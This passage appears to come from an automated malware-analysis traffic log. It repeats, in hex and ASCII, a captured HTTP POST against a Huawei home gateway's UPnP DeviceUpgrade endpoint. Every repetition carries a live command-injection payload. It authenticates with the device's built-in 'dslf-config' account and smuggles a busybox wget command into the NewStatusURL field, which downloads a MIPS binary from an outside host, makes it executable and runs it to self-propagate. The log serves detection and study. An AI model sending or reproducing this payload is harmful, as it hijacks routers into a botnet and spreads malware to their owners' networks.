63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 